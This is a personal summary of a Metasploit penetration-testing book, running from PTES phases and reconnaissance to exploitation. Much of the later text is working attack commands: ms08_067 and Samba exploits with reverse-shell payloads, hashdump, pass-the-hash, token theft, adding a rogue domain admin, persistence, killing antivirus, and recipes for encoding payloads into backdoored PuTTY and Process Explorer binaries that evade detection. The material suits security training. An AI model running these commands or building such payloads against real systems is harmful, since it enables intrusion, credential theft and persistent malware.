Hacking and pentesting with Metasploit

This is a resumee of the book “Hacking, security and penetration testing with Metasploit”. The book contains many explanations and demos for specific tools; these will not be resumed here. Instead, I will focus on concepts and theory.

The chapters are the following:

  1. Pentesting basics
    1. The 7 PTES (Penetration Testing Execution Standard) phases
    2. Penetration test types
  2. Metasploit basics : introduction to the tools of Metasploit
    1. Terminology
    2. The interfaces of Metasploit
  3. Information gathering : how to use Metasploit to gather intelligence in the early stages of a pentest
    1. Passive information gathering
    2. Active information gathering
    3. Targeted scans
  4. Vulnerability scanning : how to identify vulnerabilities and scanning techniques
    1. Base vulnerability scan
    2. Specialized vulnerability scan
    3. Using scan results for Autopwning
  5. Exploitation : introduction to exploitation
    1. Base exploitation
    2. Port bruteforcing
    3. Resource files
  6. Meterpreter : presentation of the post exploitation swiss knife
    1. Compromise a Windows XP machine
    2. Usernames and passwords retrieval
    3. Pass the hash
    4. Privilege escalation
    5. Token usurpation
    6. Pivoting to other systems
    7. Use meterpreter scripts
    8. Upgrade a command shell to a meterpreter shell
    9. Use Windows API with Railgun
  7. Avoid detection : ideas behind AVs evasion
    1. Creation of autonomous binaries with MSFpayload
    2. Avoid antivirus detection
    3. Multiencoding
    4. Customized executables
    5. Customized executables
    6. Packers
  8. Client side attacks exploitation
  9. Metasploit : auxiliary modules
  10. Social engineering toolkit (SET)
  11. FAST-TRACK : an automated pentest infrastructure
  12. Karmetasploit : how to use it for wireless attacks
  13. Create your own module : how to build your own module for exploitation
  14. Create your own exploit : covers fuzzing and exploits for buffer overflows
  15. Carry exploits on the Metasploit framework
  16. Meterpreter scripts
  17. Pentest simulation

Pentesting basics

The 7 PTES (Penetration Testing Execution Standard) phases

  1. Pre-Engagement Actions
    Discussion of the test’s scope with the client (what can we do, what methods we can use, which networks and addresses are in range, …).
    It is important to have a precise contract defining the scope and the engagements.

  2. Information gathering (Reconnaissance, footprinting)
    The idea of this phase is to gather as much information about the target as possible. We want to know how the target works and how it can be attacked. Commons reconnaissance methods include : Google hacking, domain name searches, WHOIS lookups, reverse DNS, social engineering, social networks footprinting, dumpster diving (various physical methods to get information) and tailgating (closely follow someone who has legitimate access into a secure building).

  3. Threat Modeling
    Think like an attacker about the company’s assets and how they could be used. It can be useful to make an organizational structure of the company : who works where, what is their role, can they be used to gain access to something (information gathered in the previous phase) ? In general, we are interested in employee data, customer data and technical data. There is nothing concrete in this phase, we just elaborate a plan.

  4. Vulnerability identification
    Now that we identified the best attack methods, we have to determine how we will access the target. Typically, scanning tools (port scanners, vulnerability scanners) are used in this phase. Here we try to know what systems are up, what OS are they running, if there is a firewall, an antivirus (AV), intrusion detection system (IDS), etc…

  5. Exploitation
    An exploit should be made only if we are 100% sure that it will work. Before taking advantage of a vulnerability, we have to know that the system is vulnerable. The goal is to gain access to systems, and gain as high of administrator access as possible.

  6. Post-exploitation
    Starts after we have compromised one or more systems. In this phase, we target specific systems, identify critical infrastructures and look for data that the target tried to secure. To what point can we jeopardize a system, and what would the repercussions be ? We really have to think like a pirate in this phase.

  7. Report
    The report is the most important part of a pentest. It contains what we did, how we did it, and most importantly, what could the organization do to correct the vulnerabilities we found and used. The purpose is that the client enhances the global security, not that he just patch the vulnerabilities we found. The report should contain an abstract, a presentation and a technical part.

Penetration test types

  1. White box (white hat)
    It is a visible test : we work with the client. Pros : the client’s security team can show us the systems and everything we might want to know. Cons : might be biased. A white box test can be good when we have a limited time and can’t do a proper information gathering phase.

  2. Black box
    It is an invisible test, performed without the knowledge of the organization. Pros : much more realistic than a white box test. Cons : lasts way longer than a white box test and require more skills. If possible, this should be the prefered over a white box test.

Metasploit basics : introduction to the tools of Metasploit


An exploit is the mean by which an attacker take advantage of a vulnerability in a system, an application or a service. buffer overflows and SQL injections are examples of exploits.

A payload is a piece of code that we want to be executed by the tarhet system. For example, a reverse shell is a payload that creates a connection from the target to the attacker, whereas a bind shell is a payload that binds a listener on a port of the target machine so that the attacker can connect to it.

A shellcode is a set of instructions used by a payload during an exploit. It is typically written in assembly. In most cases, a shell or a meterpreter shell is used after a set of instructions has been executed by the machine.

A module is a part of a software that can be used by the Metasploit framework. It is sometimes necessary to use an exploit module that carries the attack, or an auxiliary module to scan or enumerate systems.

A listener is a procedure or function that awaits any entering connection. For example, once that target has been exploited, it can communicate with the attacker via internet. The listener handles this connection.

The interfaces of Metasploit

There are 3 interfaces: Msfconsole, a CLI (command line interface) and a GUI (graphical user interface, Armitage), and different utilities. We will be using msfconsole only. The utilities are direct interfaces that can be useful for exploit development and are the following:

Msfpayload is used to generate a shellcode, executables and more. Shellcode can be written in many languages (C, Ruby, JavaScript, …). Each format is useful in different situations; for example if we want to create an exploit for a browser, JavaScript would be a good choice. The payload can then simply be inserted into an HTML file. To see the options used by the utility, we can use the command msfpayload -h.

The shellcode generated by MSFpayload works, but it contains null characters which, when interpreted by some programs, mean the end of a string. In other words, the code would stop before it reaches the end because of some x00s and xffs.

In addition to that, it’s risky to send a shellcode in plaintext on a network; it could be easily detected by IDS (intrusion detection system) and AV (antivirus).

Msfencode is used to encode the payload in a way that avoids those undesired characters. We can see the list of options with the command msfencode -h. There are different encoders, useful for different situations. One of the best encoder is x86/shikata_ga_nai (msfencode -l shows a list of available encoders).

Nasm Shell
Useful to analyze assembly code, especially if we want to identify opcodes of an assembly instruction. For example, we can start the tool with ./nasm_shell.rb and then ask for the code of jmp esp; it would return 00000000 FFE4.

Information gathering : how to use Metasploit to gather intelligence in the early stages of a pentest

Information gathering is the second phase of the PTES and maybe the most important. It is the basis of all the work that will come after it.

Passive information gathering

We collect information without touching the target systems. We can identidy the architecture, the network admins, what OS is used and what web server is used on the target network. OSINT (Open Source Intelligence) is a form of information gathering during which we use free free or easily obtainable information to chose and acquire information on the target.

A few examples are whois lookups (for example, whois google.com in a terminal gives a lot of information), Netcraft (a web tool to find the IP of a server hosting a website) and NSLookup (gives more information on the server.)
Passive information gathering is useful to define what systems should be included in the pentest (in a legal point of view).

Active information gathering

In active information gathering, we interact directly with a system to learn more about it. Port scanning is an example of active information gathering. Nmap is one of the most popular port scanner.

In a complex pentest, where there are multiple targets to scan, it is very important to keep a trace of what we do. Fortunately, Metasploit has its own databases (MySQL and PostgreSQL), PostgreSQL being used by default.

Pivoting is the process by which we can access and attack systems that would be out of reach by using interconnected systems to route traffic.
Example: let’s suppose we compromised a system behind a Firewall using NAT (Network Address Translation). This system uses private IP addresses that we can’t access from the internet. We can use this compromised system to avoid the firewall and access the internal network of the target.

Targeted scans

It is sometimes useful to perform targeted scans to find specific services and/or versions that we know are vulnerable. Some examples are:

Vulnerability scanning : how to identify vulnerabilities and scanning techniques

Finding vulnerabilities automatically can be done with the help of a vulnerability scanner. It basically sends data on a network and analyze the answers to enumerate vulnerabilities, using a vulnerability database. OS answer differently based on their network layers implementations, and those unique answers are used by the scanner to determine the OS version and its patch version. It can also connect to the target system and enumetate softwares and services to see if they are patched.

Vulnerability scanners are very noisy on a network. They should not be used if we want to be unnoticed, but can save valuable time if it doesn’t matter.

Base vulnerability scan

We can use netcat to perform a banner grabbing on the target. The command would be nc 80: here we connect to on a web server (port 80), and we can then use the command GET HTTP to receive headers information returned by the server. Imagine we receive the information Server: Microsoft-IIS/5.1: we could then use a vulnerability scanner to determine if this ISS version has known vulnerabilities and if the server is up to date.
It can be harder in reality, because there are false positives and false negatives.

NeXpose and Nessus are examples of vulnerability scanners (see the book for more details on their use). NeXpose can either be used from a web interface or directly in Metasploit with the plugin NeXpose. Nessus can also be used in Metasploit with the plugin Nessus, or in a web interface.

Specialized vulnerability scan

Sometimes we want to perform a specific analysis for a vulnerarbility on the network: Metasploit has many auxiliary modules for that. Some examples are:

Using scan results for Autopwning

The tool Autopwn from Metasploit automatically targets and exploit a system using an open port or the results of a vulnerability scan. We can use it to exploit the results of a Nessus or NeXpose scan, for example.

Exploitation : introduction to exploitation

Systems and networks are generally becoming better protected, and basic exploits are less likely to work. This chapter focuses on more complicated attacks and exploits customization with msfconsole, msfencode and msfpayload.

Base exploitation

Port bruteforcing

Until now, we assumed that the reverse port was always opened. However, most companies block outgoing connections, except on a few specific ports. It can be hard to determine the ports that allow an outgoing connection.

We can easily guess that port 443 (HTTPS) will not be inspected and allows an outgoing TCP connection. We can also suppose that ports 23 (Telnet), 21 (FTP), 22 (SSH) and 80 (HTTP) are authorized.

However, Metasploit has a payload defined to look for open ports. This latter will try all the available ports until it finds an open process. It is the payload windows/meterpreter/reverse_tcp_allports (we can find it with the command search ports). We launch the exploit without specifying LPORT; it will automatically open a meterpreter session on an outgoing port.

Resource files

Resource files are script files that allow to automate commands in msfconsole. They contain a list of commands that are executed sequentially by msfconsole.

These files can be loaded into msfconsole with the command resource. For example, we can use a SMB exploit in a new resource file called autoexploit.rc: We define a payload, the attack and the target’s IP in this file (so we don’t have to do it manually when we try the exploit). We would:

echo use exploit/windows/smb/ms08_067_netapi > autoexploit.rc
echo set RHOST *target IP* >> autoexploit.rc
echo set PAYLOAD windows/meterpreter/reverse_tcp >> autoexploit.rc
echo set LHOST *my IP* >> autoexploit.rc
echo exploit >> autoexploit.rc

We would then start Metasploit with msfconsole and launch the exploit with resource autoexploit.rc.

Meterpreter : presentation of the post exploitation swiss knife

Meterpreter is the “swiss knife” of post-exploitation. It is one of the most popular tool of Metasploit, used as a payload after the exploitation of a vulnerability. A payload represents the information sent back to us when we trigger an exploit.
For example, when we exploit a vulnerability in a RPC (Remote Process Call), launch it with Meterpreter as payload, it will give us a meterpreter shell on the system. Meterpreter is an extension of the Metasploit framework that allows to go deeper, for example by covering our tracks, dump hashes, pivot, and more.
In this chapter, the payload Meterpreter is used to perform additional attacks once the system has been compromised.

Compromise a Windows XP machine

In the book, they start by compromising a Windows XP machine to get a meterpreter shell. The resumed steps are the following:

Great, the exploit worked and we got a meterpreter shell. We can continue the exploitation on this system. The command help gives informatin about the use of meterpreter.

Meterpreter base commands

Usernames and passwords retrieval

Previously, we retrieved hashed usernames and passwords with a keylogger. Fortunately, it is not the only way to do it; we can also use meterpreter to retrieve usernames and hashed passwords in local files.

Retrieve hashed passwords
We use the postexploitation module hashdump of meterpreter to extract usernames and passwords out of the system. Microsoft usually stocks hashes for LAN Manager (LM), NT LAN Manager (NTLM) and NT LAN Manager v2 (NTLMv2).\ In LM, passwords are divided into 7 characters and hashed. For example, password123456 would be divided into passwor and d123456. LM is easy to crack because even for our 14 characters long password, we in fact only have to crack two 7 characters long passwords.
In NTLM, the password isn’t divided and would be hashed as a single value.

If a password is longer than the 14 characters supported by LM, it is automatically converted into a NTLM hash.

Imagine we extract a username for the admin user (by default UID 500 on Windows) and a hashed password. It is written as follows:


The first hash (starting with e52 and finishing with 59e) is a LM hash, and the second (starting with 30e and finishing with f0c) is a NTLM hash. The “syntax” is username:UID:lmhash:ntlmhash.

Discover the password of a hash
To retrieve the database of the SAM (Security Account Manager), we have to get the SYSTEM rights. This file contains usernames and passwords for Windows.
We use the command use priv and execute the command hashdump (run post/windows/gather/hashdump).
If the password is very long, the hash will be starting with aad3b435, which is an empty hash (an other valid syntax is Administrator:500:NOPASSWD:ntlmhash). This is because if it is longer than 14 characters, Windows cannot stock it as a LM hash and signifies it with an empty string.

If we find a LM hash, we can copy it and use an online cracker tool to crack it. If it’s a NTLM hash, it’s more complicated… The next section will help in this case.

Pass the hash

Sometimes, passwords are complicated and impossible to crack. Nevertheless, we need it to connect to other machines and compromise other systems with that user account…

Fortunately, if we only have a hash (and no plaintext password), we can use the technique pass the hash. Example:

use windows/smb/psexec
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST *my IP*
set LPORT 443
set RHOST *target IP*
set SMBPass *hashed password*

Where the hashed password would be something like aad3b435b51404eeaad3b435b51404ee:b75989f65d1e04af7625ed712ac36c29 (we see that the LM hash is an empty string). This exploit would give us a meterpreter session, so we get admin privileges with a simple hash. It is not rare that other systems on the network have the same admin account, so we could jump from a system to another without ever having to break the password.

Privilege escalation

If we compromise a user account which has limited access, we can’t execute commands that require an admin access. We can bypass this restriction with privilege escalation.

In the book, they create a normal user account (called bob) on a Windows XP machine to demonstrate privilege escalation.
First, we create the new user account with the command net user bob password123 /add..
Then, we create a meterpreter payload (payload.exe) which we copy in the target XP machine and execute as the user bob.
We will use msfpayload to create a meterpreter payload from an executable Windows.

The steps are the following:

msfpayload windows/meterpreter/reverse_tcp LHOST=*my IP* LPORT=443 X > payload.exe
msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp

This gives us a meterpreter session. We called the interface msfcli to start a listener handler. This handler will wait for connections, and when it receives one, it will spawn a meterpreter shell. When the target executes the payload (payload.exe), it will spawn a meterpreter will limited permissions (that we can see with the command getuid). Once we get the meterpreter session, we can invoke a shell with the command shell. Then, we type net user bob: we see he is a member of the group users, that he is not an admin and has limited permissions. We can’t execute a hash dump of the SAM database to extract usernames and passwords. We can press CTRL + Z to save our session and stay in the exploited system. We can then use background to come back in msfconsole and quit the current session. Then, we can use sessions -l and sessions -i sessionid to come back to meterpreter.

We will now obtain admin permissions or SYSTEM:

use priv

We first call use priv to load the priv extensions, which give us access to the privileged module.
Then, we use the command getsystem to elevate our privilege to local systeem or admin.
Finally, we use the command getuid to check our permissions.
We can come back to the normal user bob with the command rev2self.

Token usurpation

In token usurpation, we retrieve a Kerberos token on the target machine and we use it for authentication (we borrow its creator identity).
Let’s imagine we compromised a system and opened a meterpreter session. An admin account was connected in the last thirteen hours. When this account connects, a Kerberos token is transmitted to the server (single sign-on or SSO) and is valid for a certain amount of time. We exploit this system via the valid and active Kerberos token, and we get admin permissions with meterpreter without needing the password. We can then compromise a domain admin account.
This is one of the easiest way to take over a system.

So, suppose we get a meterpreter session. We use the ps command to list active processes, and see a process called cmd.exe with the PID 380. We can then use the command steal_token 380. We just usurpated the domain admin account and meterpreter is now executing for this user account.

Sometimes, ps can’t enumerate an active process as a domain admin. In this case, we can use incognito to list available tokens on the system. It is generally a good practice to compare the results of ps and incognito, since they can differ.
We load the extension incognito with use incognito and list token with list_tokens -u.\ We can now usurpate an identity with the command impersonate_token DOMAIN\USERNAME.
Then, we can add a user account to which we give domain admin permissions:\

use incognito
list_tokens -u
add_user omgcompromised p@55w0rd! -h *Host IP*
add_group_user "Domain Admins" omgcompromised -h *Domain controller IP*

Note that in reality, we would have to use 2 “" between DOMAIN and USERNAME.

Pivoting to other systems

Pivot is a meterpreter method which allows to attack other systems on a network via the console.
In the following example, we will attack a system in a network and then route our traffic via this system to attack another system. We will start by exploiting a Windows XP machine, and then propagate the attack to a Ubuntu machine on the internal network. We will connect to the address and attack systems within the network

Let’s suppose we already have access to a server. We will focus on the establsihment of a connection to this server, and then on the insertion of external scipts written with meterpreter which can be found in the directory scrripts/meterpreter.
We start by looking at local subnets on the compromised system with the command get_local_subnets. When then set aside our active session with background, and add a route command to the framework, asking to route the remote network ID to session 1 (the meterpreter session in the background). Finally, we display active routes with route prrint:

run get_local_subnets
route add 1
route print

Note that instead of route add, we could automatically add routes with the command load auto_add_route. Now, we will set a second exploit against the target system Linux. The specific exploit here is a heap overflow based on Samba:

use linux/samba/lsa_transnames_heap
set payload linux/x86/shell/reverse_tcp
set LPORT 8080

This should give us a reverse shell from We can now scan ports through the pivot with the module scanner/portscan/tcp.

Use meterpreter scripts

Many external meterpreter scripts can help enumerate a system or execute predefined tasks in a meterpreter shell. In the book, it is said that scripts are being modified into postexploitation modules; I will still resume them here. We can execute a script in the console with the command run scriptname. For example, we can install a VNC session on the target and display its desktop with run vnc and then run screen_unlock. Here is a list of some of the best ones:

Migration of a process
Often, when we attack a system and exploit a service like Internet Explorer, our meterpreter session is closed when the user closes the browser; we lose our connection to the target. We can avoid this problem with the postexploitation module migrate. This latter migrates the service to a memory location which is not closed when the user closes the browser. The command is the following:

run post/windows/manage/migrate

Kill an antivirus
Obviously, an AV can prevent certain actions. We can kill it with the script killav:

run killav

Obtain password hashes of the system
A copy of the hash allows us to execute the pass-the-hash attack or bute-force the passwords. As we saw it previously, we can get hashed passwords with the command hashdump:

run hashdump

Spy the traffic on the target
To see the traffic on the target, we use a packet sniffer. Everything recorded by packetrecorder is saved in a file with the .pcap format. We can then analyze it with a tool like Wireshark.
In the following command, we specify the interface on which to listen (1 here) with the flag -i:

run packetrecorder -i 1

Scraping of a system
The script scraper enumerates everything we would lik to know on a system: it retrieves usernames and passwords, download the register, retrieve password hashes, get information on the system and export the HKEY_CURRENT_USER (HKCU).

run scraper

Use persistence
The script persistence allows to inject a meterpreter agent to make sure that meterpreter will be available, even if the target system is restarted.
In the case of a reverse connection, we can define the time at which the target will try to connect to the attacker machine.
In the case of a bind, we can connect to the interface anytime.
It is important to remove it when we’re done, otherwise any attacker will be able to connect without authentication.
In the following commands, we use the persistence and ask Windows to activate the agent whenever it boots (-X), to wait 50 seconds (-i 50) before it tries to connect on the port 443 (-p 443) at the IP We then set a listener for the agent with the command use multi/handler and execute the exploit:

run persistence -X -i 50 -p 443 -r
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LPORT 443

The only way to remove the agent is to delete the entry in HKLM\Software\Microsoft\Windows\CurrentVersion\Run and to delete the VBScript code in C:\WINDOWS\TEMP. Make sure to save the register keys and locations (such as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\xEYnaHedooc) to delete them manually. We can usually do it via meterpreter.

Upgrade a command shell to a meterpreter shell

One of the newest functionnality of Metasploit is its capacity to upgrade a command shell type payload into a meterpreter payload once the system has been compromised. This is done with the command sessions -u. This is useful in the case where we start with a command shell payload and then realize that the exploited system would be perfect for further attacks in the network. Let’s look at the following example:

search ms08_067
use windows/smb/ms08_067_netapi
set PAYLOAD windows/shell/reverse_tcp
set TARGET 3
setg LHOST
setg LPORT 8080
exploit -z
sessions -u 1
sessions -i 2

Note that we used setg for LHOST and LPORT: this is necessary so that sessions -u 1 upgrades our shell to a meterpreter shell. Also, we used exploit -z, so that it doesn’t interact with the session once the the target has been exploited.

Use Windows API with Railgun

We can use the Windows API directly from a Metasploit addon called Railgun. In the following example, we will pass into an interactive Ruby shell (irb) available via meterpreter.
The irb shell allows us to interact directly with meterpreter with Ruby syntax. Here, we call Railgun and create a pop-up saying “Hello world”:

client.railgun.user32.MessageBoxA(0, "Hello", "world", "MB_OK")

On the target Windows XP, we should see a pop-up. We called user32.dll and the function MessageBoxA.
A list of API calls can be found on http://msdn.microsoft.com/.

Avoid detection : ideas behind AVs evasion

Obviously, we don’t want to be busted when we break into a system. This is why it is important to make a plan for avoiding AV detection. This chapter focuses on situations in which AVs can be a problem, and how we can avoid it.

Most AVs use signatures to identify malicious code. If a matching signature is found within a program, process, or disk memory, most AVs quarantine the binary file or kill the executing process. If we use a common payload, we can expect it to be detected by the AV. To avoid AVs, we can create custom payloads that don’t contain any known signature. Furthermore, when we use exploits directly against a system, metasploit payloads are conceived to execute in memory and never write data on the disk. So, when we send a payload with an exploit, most AVs do not detect it was executed on the target.

Creation of autonomous binaries with MSFpayload

We will start by creating a simple reverse shell that connects to the attacker and returns a shell. We will use msfpayload and windows/shell_reverse_tcp.
Let’s look at the available options for the shell_reverse_tcp payload with the O flag:

msfpayload windows/shell_reverse_tcp O

There are 3 required parameters: EXITFUNC, LHOST and LPORT.
The EXITFUNC sets a function hash in the payload that specifies a DLL (Dynamic Link Library) and function to call when the payload is complete. A DLL injection is a technique used to execute code within the address space of another process by forcing it to load a dynamic link library. There are 4 different values for EXITFUNC:

In the output of the previous command, EXITFUNC is set to process and LPORT (listen port) to 4444. We have to set LHOST (listen address).
We will now create this payload in Windos Portable Executable (PE) format. PE format is a file format for executables, object code, DLLs and others used in 32-bit and 64-bit versions of Windows OS.
To do so, we add the option X:

msfpayload windows/shell_reverse_tcp LHOST= LPORT=31337 X > /var/www/payload1.exe
file /var/www/payload1.exe

Now that we have an executable, we can set a listener with the module multi/handler in msfconsole. This module allows metasploit to listen to reverse connections.
In msfconsole, we type the following commands:

use exploit/multi/handler
show options
set PAYLOAD windows/shell_reverse_tcp
set LPORT 31337

We are ready for the next step, avoiding AVs.

Avoid antivirus detection

In the book, they use the AVG antivirus. They start by making sure the AV detects the payload in its current state (which it does).

Encode with MSFencode
One of the best way to avoid AV detection is to encode the payload with MSFencode. This tool modifies the code of a payload so that it isn’t detected by an AV. It encodes the original executable in a new binary file. Then, when it is executed, msfencode decodes the original code in memory and execute it.

The command msfencode -h displays the options. Among those, encoding formats are very important (we can see them with msfencoode -l). Different encoders are used for different platforms (for example, a Power PC (PPC) encoder will not work on a x86 platform because of the differences between the two architectures).
One of the best encoder is x86/shikata_ga_nai. Let’s encode a Metasploit payload:

msfpayload windows/shell_reverse_tcp LHOST= LPORT=31337 R | msfencode -e x86/shikata_ga_nai -t exe > /var/www/payload2.exe
file /var/www/payload2.exe

We added the flag R to specify raw output, because we redirected it directly in msfencode with a pipe (|). We used the shikata_ga_nai encoder and asked msfencode to save the executable in the file /var/www/payload2.exe. Finally, we make sure that the resulting file is Windows executable (with file /var/www/payload2.exe).
However, when the file payload2.exe is copied on the Windows system, it is still detected by the AV (eventhough it is encoded). This brings us to the next section.


Our payload was detected because AVs signatures are frequently updated to detect new payloads (and the modified ones).
Multiencoding allows to encode a file multiple times to get rid of AVs that verify signatures.

In the encoder descriptions, it is said that shikata_ga_nai is polymorphic: the payload changes each time the script is executed. Because it is random, it will sometimes be detected, and sometimes it won’t.
It is a good practice to test the script with an AV before using it in a pentest.

Here is an example of a multiencoding:

msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=31337 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 5 -t exe -o /var/www/payload3.exe
file /var/www/payload3.exe

The flag -c 5 is used to indicate that we want the payload to be encoded 5 times. Here, we used a total of 17 encoding loops. This time, the payload is not detected by the AV.

Customized executables

Usually, when msfencode is executed, the payload is integrated in the default executable model data/templates/template.exe. Eventhough this model is modified from time to time, AVs sellers frequently check it when creating signatures.
Msfencode now takes over the use of a Windows executable instead of the default via the option -x. In the follwing example, we code our new payload with the Process Explorer of Sysinternals Suite from Microsoft as a new custom executable:

wget http://download.sysinternals.com/Files/ProcessExplorer.zip
cd work/
unzip ../ProcessExplorer.zip
msfpayload windows/shell_reverse_tcp LHOST= LPORT=31337 R | msfencode -t exe -x work/procexp.exe -o /var/www/pe_backdoor.exe -e x86/shikata_ga_nai -c 5
msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST= LPORT=8080 E

On the last line, we start the multihandler via msfcli to listen to the incoming connection. This is it, we opened a shell without being detected by an AV.\

Customized executables

In the book, they also explain how to execute a payload in a different thread: this allows the application to work normally (because so far, when we execute a backdoor executable, nothing seems to happen for the user and it is suspicious). Let’s look at an example:

wget http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
msfpayload windows/shell_reverse_tcp LHOST LPORT=8080 R | msfencode -t exe -x putty.exe -o /var/www/putty_backdoor.exe -e x86/shikata_ga_nai -k -c 5

Here, we first downloaded the Windows SSH client PuTTY and access it with the flag k. This latter configures the payload to execute it in a separate thread from the original executable. This ensures the application works normally while the payload is getting executed.


Packers are tools which compress and encrypt an executable all at once. Let’s look at an example with the famous UPX packer:

apt-get install upx
upx -5 /var/www/payload3.exe

Client side attacks exploitation


Metasploit : auxiliary modules

Social engineering toolkit (SET)

FAST-TRACK : an automated pentest infrastructure

Karmetasploit : how to use it for wireless attacks

Create your own module : how to build your own module for exploitation

Create your own exploit : covers fuzzing and exploits for buffer overflows

Carry exploits on the Metasploit framework

Meterpreter scripts

Pentest simulation